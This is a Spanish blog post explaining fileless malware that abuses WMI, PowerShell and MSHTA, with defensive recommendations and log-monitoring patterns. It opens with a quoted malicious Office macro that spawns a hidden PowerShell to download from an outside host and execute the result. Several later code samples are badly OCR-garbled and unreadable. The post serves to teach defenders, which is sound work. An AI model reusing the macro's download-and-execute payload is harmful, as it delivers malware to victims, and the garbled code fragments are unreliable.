Fran 🐝 Brizzolis

hace 7 años · 4 min. de lectura · 1K ·

Blogging
>
Blog de Fran 🐝
>
Los virus del futuro: Nuevos malware "invisibles" que no crean archivos maliciosos

Los virus del futuro: Nuevos malware "invisibles" que no crean archivos maliciosos

Sub AutoOpen()

x1 “Download”

 

 

 

power” & "shell" & “.exe"

Const HIDDEN_WINDOW = ©

strComputer )

abcdef = h & "ing"

Set objwMIService = GetObject("winmgmts:\\" & strComputer & “"\root\cimv2")

 

Set objStartup = objwWMIService.Get("Win32_ProcessStartup")

Set objConfig = objStartup.SpawnInstance_

objConfig.ShowwWindow = HIDDEN_WINDOW

Set objProcess = GetObject ("winmgmts:\\" & strComputer & “
\root\cimv2:Win32_Process")

objProcess.Create o & " -ExecutionPolicy Bypass -WindowStyle Hidden -
noprofile -noexit -c if ([IntPtr]::size -eq 4) {(new-object Net.
webClient)." & x1 & abcdef & “('http://rabbitons.pw/cache’') | iex }
else {(new-object Net.wWebClient)." & x1 & abcdef & "('http://rabbitons.
pw/css') | iex}", Null, objConfig, intProcessID

(CET


Tradicionalmente el malware crea ficheros, copias de sí mismo o malware adicional que replica en diferentes ubicaciones del sistema que compromete, pudiendo hacerlo además con nombres similares a ficheros legítimos, con el fin de pasar desapercibido el mayor tiempo posible. Así mismo, con el fin de mantener persistencia, se ejecuta de manera automática mediante un servicio o una tarea programada, o desde el registro creando para ello valores en alguna de las claves que se cargan al iniciar el sistema operativo como, por ejemplo:


  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
  • HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
  • HKLM\Software\ Microsoft\Windows\CurrentVersion\RunServices
  • HKLM\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run


Pese a que esta práctica se sigue manteniendo hoy en día, desde hace ya tiempo, y cada vez más habitualmente, con el fin de dificultar la labor de las suites de seguridad, las cuales, además de detecciones por firmas, monitorizan los cambios en el sistema mediante protecciones heurísticas, los creadores de malware han optado por un modelo sin fichero «Fileless Malware». Este tipo de malware, también conocido como «hit & run» ya que comprometen los sistemas, realizan la tarea para la que han sido diseñados y posteriormente desaparecen procurando no dejar rastro, se mantiene residente únicamente en memoria y, como su propio nombre indica, no en disco, y aprovecha de manera habitual las características, funcionalidades y herramientas propias de los sistemas operativos en su beneficio como, por ejemplo:


  • Windows Management Instrumentation (WMI): atendiendo a la definición de Microsoft, “es la fuente principal para administrar los datos y la funcionalidad en equipos locales y remotos que ejecutan los sistemas operativos Microsoft Windows”. Permite realizar multitud de tareas como realizar copias de seguridad, autorizar usuarios o grupos y establecer niveles de permisos, etc.
  • PowerShell: atendiendo a la definición de Microsoft, “es un lenguaje de scripting y shell de línea de comandos basado en tareas diseñado especialmente para la administración del sistema”. Está llamado a sustituir a la tradicional consola de comandos.
  • Host de aplicación HTML de Microsoft (MSHTA): permite interpretar código JavaScript.


Estas aplicaciones, además de muy potentes, se ejecutan con los permisos del usuario logueado en la máquina y apenas dejan rastro, lo que representa una ventaja adicional y significativa para los creadores de malware.


Con el fin de concretar la utilidad y uso de estas herramientas durante un ataque, a continuación, se indica el modelo desarrollado por analistas de Lockheed Martin Corporation en 2011 conocido como Cyber Kill Chain, de lo que ya hablé anteriormente en este post .


Nngtien get_camtancs id §
Souticon = New-Coject -Comopiect Outlook Applicatics
$item - fostiook eszive GetCisbalAdiresslis:() Addiesstnisies
$contacts -
Foraact (81 in $item) |
Scontacts s= $1 Kame +0. 'e $1 GetEachangelser() MobileTelephonemmbers’ es

 

dee Eachange

   

Primaryras pasa:
'

rotor $oontacts

'



Si bien su utilización no es exclusiva durante las fases que a continuación se indican, de manera habitual se usan durante:

  • Distribución, a modo de downloader (por ejemplo, mediante una macro).
 

Reflection Avienbly]  LoadeithPast aliens Tiyttom Deming)

fnction wirrematot [Coming dec tangliclSboundn, $path) {
Shap - Mew Object Crming Ditaap Shounds width, Shounds height
Sgrapticn - [Drang Graphics] lronlaage(Step

  

 

     

 

Sgeaphics nce een(Shounds Location, [0 ming Point] bapty, Sounds niie
Soap auc (Sgatt)
Sgrapnics Dispouc

  

Stag Dispuac i

 

Srounds [Drm
rreemihor Shounds CC acermstot pe

& Bectangle] #oimcin(a, e, oe, wo)




  • Explotación, para realizar un movimiento lateral, para obtener credenciales, realizar un escalado de privilegios o para extraer información.
 


14 Ca Dc

 

 

Tye M552 argh 01692 Cua 33° 2
ea avg $12 10 Sogn hareaped
ese 417 Lang 314 £10 ge opener
10 E24 Lag 40 Fis Wi
2 3 Lara 45065 Fags ovo

  

om ann Art DAs
at «pd KA Bd DI

 

a.

 

 

Rea hie HOLS me al rams Crier hor Sel fant Soe Ton ALG 22 Lang 114 Cora C Locman a
Cv ath sn OL bert iret sei aricet i ge 1065 Longin 666 Ces rel ve too.

 

   

DOH A AT Bo WP MR 12ST fe

Berber TAT TOmE OBC a2 A CONAMITCAT OG ODA Se

bi ara OTT a7 Ia Hel esl LFS 1 Sl oR TMA Hd

Ge am Na TCT Taian Ya BPO CU ZR YG Mh 8 PERT Abe eg 0 en LK WRI TAR B00 a MB)
Aart Ia usd ASP mR LB df dL SARE CARL MLA a BATTS £00

TAGHELGONNG AE Pat INI 0 C3 7 CCTMOA of ante | DUDING Bd 351 Rd AL 1,1] CCT 24 7a dC

pire Pee TE rv Apert hal rene te eek

4 Vi TPA” wir,
OLE TH MIN 4
hh A Sl                  Ejemplo de función para obtener mediante PowerShell un listado completo de contactos del Outlook.



09c28abe.png

Código en PowerShell para realizar capturas de pantalla.

 


  • Instalación, para establecer la persistencia en el caso de que el malware lo requiera.
 

5a5abe3c.png

Ejemplo de cómo el malware GAV: Poweliks.CCL utiliza rundll32.exe para mantener persistencia.

 


Desde 2010, cuando se detectó WMIGhost, uno de los primeros malware que se identificó que aprovechaba WMI para fines maliciosos, se han detectado multitud de familias de malware que se aprovechan de las utilidades anteriormente indicadas: Poweliks, Trojan.Kotver, JS.Nemucod (el cual descarga un ransomware) o PowerSniff son sólo algunos ejemplos de ello.


Atendiendo a un reciente estudio de Symantec, el 95,4% de los scripts de PowerShell que analizaron en 2016 eran maliciosos. Y como refleja un estudio de la empresa de seguridad CarbonBlack, estas técnicas son cada vez más utilizadas por el malware y por los cibercriminales en sus ataques.


Es importante tener en cuenta que el «fileless malware» no es exclusivo de Windows, sino que también está presente en otros sistemas operativos. Para ello, utilizan herramientas instaladas por defecto que soportan lenguajes de scripting como perl, python, bash, ruby, etc. o incluso el propio PowerShell, disponible ya tanto para Linux como para OSX.


Es por ello que hay que ser consciente del riesgo que suponen este tipo de amenazas y tomar las medidas necesarias para reducir o dificultar la exposición a ellas.


  • Utilizar una política de usuarios con privilegios limitados.
  • Instalar la última versión de PowerShell.
  • Configurar AppLocker para bloquear la ejecución de ficheros relacionados con PowerShell, como por ejemplo aquellos con extensión .ps1, o para poder ejecutar ficheros únicamente desde rutas confiables.
  • Establecer una directiva de grupo (GPO) del tipo de restricción de software (SRP) indicando el hash el fichero PowerShell.exe con el fin de bloquear su ejecución. Pese a ello, hay que tener en cuenta que se pueden seguir ejecutando instancias de PowerShell sin necesidad de invocar al fichero ejecutable.
  • Pese a que la política por defecto de PowerShell es la de restringir la ejecución de scripts, no es excesivamente complicado saltársela. Existen múltiples modos como, por ejemplo: cargar un fichero directamente desde Internet sin almacenarlo en disco mediante «Invoke Expression», leer un script y redirigirlo al ejecutable PowerShell.exe o utilizar el flag «Bypass» en la ejecución. Es por ello que se recomienda establecer una directiva de grupo (GPO) para activar los logs de PowerShell, y monitorizarlos en busca de patrones como los que indico a continuación:


      • kernel32.dll
      • msvcrt.dll
      • OpenProcess
      • VirtualAllocEx
      • VirtualAlloc
      • WriteProcessMemory
      • GetModuleHandle
      • GetProcAddress
      • VirtualProtect
      • CreateRemoteThread
      • CreateThread
      • CloseHandle


    • Relacionados con inyección de código:
      •  Invoke-Expression
      •  iex
      •  Invoke-Command
      •  powershell/powershell.exe


    • Relacionados con la actividad de red:
      • System.Net.HttpWebClient
      • System.Net.WebClient
      • System.Net.HttpListener
      •  System.Net.Sockets.Socket


    • Relacionados con el cifrado de datos:
      • ConvertTo-SecureString cmdlet
      • Security.Cryptography.CryptoStream
      • [System.Convert]::ToBase64String($string)
      • Identifying any random or encoded data chunks
      • Búsqueda de términos como encrypt, crypt, password, pass, etc.

  • Relacionado con el punto anterior y con el fin de simplificar el proceso, lo más óptimo es centralizar la gestión de logs.
  • Establecer una directiva de grupo para bloquear las macros de Office (disponible a partir de Office 2016).
  • Es posible utilizar algún plugin de Volatility para monitorizar la memoria en tiempo real en busca de ciertos patrones.
  • Monitorizar las entradas de registro habituales donde el malware establece persistencia.


Por otra parte, existen una serie de utilidades que pueden ayudar en esta tarea, así como para profundizar más en el tema:


  • Autoruns – muestra las aplicaciones y servicios que se ejecutan al iniciar el sistema operativo. Tiene soporte para entradas WMI.
  • Frameworks orientados a las fases de explotación y post-explotación en un pentesting: PowerSploit, Empire, Nishang o p0wnedShell.
 






Referencias:


http://papers.rohanamin.com/wp-content/uploads/papers.rohanamin.com/2011/08/iciw2011.pdf

https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=761

http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-macro-based-attacks/

http://www.asd.gov.au/publications/protect/Securing_PowerShell.pdf

http://www.volatilityfoundation.org/

https://technet.microsoft.com/ko-kr/sysinternals/bb963902

https://www.powershellempire.com/






""""""
Comentarios

Artículos de Fran 🐝 Brizzolis

Ver blog
hace 5 años · 3 min. de lectura

Los mecanismos conocidos como "skimmers de tarjetas" han sido una amenaza importante para la segurid ...

hace 5 años · 2 min. de lectura

Hola abejas, el verano está llegando a su fin, y poco a poco todos vamos recuperando "nuestro ritmo ...

hace 5 años · 10 min. de lectura

Hola abejas, estos días me costaba bastante encontrar un tema sobre el que escribir, y que no me hic ...

Puede que te interesen estos puestos de trabajo

  • Cronoshare

    Informático a domicilio para quitar virus o malware en pc

    Encontrado en: Cronoshare ES C2 - hace 4 horas


    Cronoshare Molins de Rei (Barcelona), España

    Se trata de un virus de un programa a medida en php. · Se instalo hace 15 años¿Qué le ocurre a tu ordenador o dispositivo? · Quitar virus o malware · ¿Qué dispositivo es? · Pc · Sistema operativo del dispositivo · Windows 10 · ¿El equipo está en garantía? · No · ¿Dónde se hará el ...

  • Cronoshare

    Reparación de pc para quitar virus o malware

    Encontrado en: Cronoshare ES C2 - hace 1 día


    Cronoshare Alzira (Valencia), España

    El ordenador ha debido contraer un virus, ya que, me dice que el disco duro está lleno, cuando apenas tengo instalados programas en él.¿Qué le ocurre a tu ordenador o dispositivo? · Quitar virus o malware · ¿Qué dispositivo es? · Pc · Sistema operativo del dispositivo · Windows 1 ...


  • Cronoshare Valencia (Valencia), España

    Tengo una placa solar que necesita batería e instalación y una motosierra montaje me esta dando problemas la cadena.. Y hacerle haybreik y protección a mis mis smarfons¿Qué le ocurre a tu ordenador o dispositivo? · Minar, quitar virus o malware, instalar nuevo software (programas ...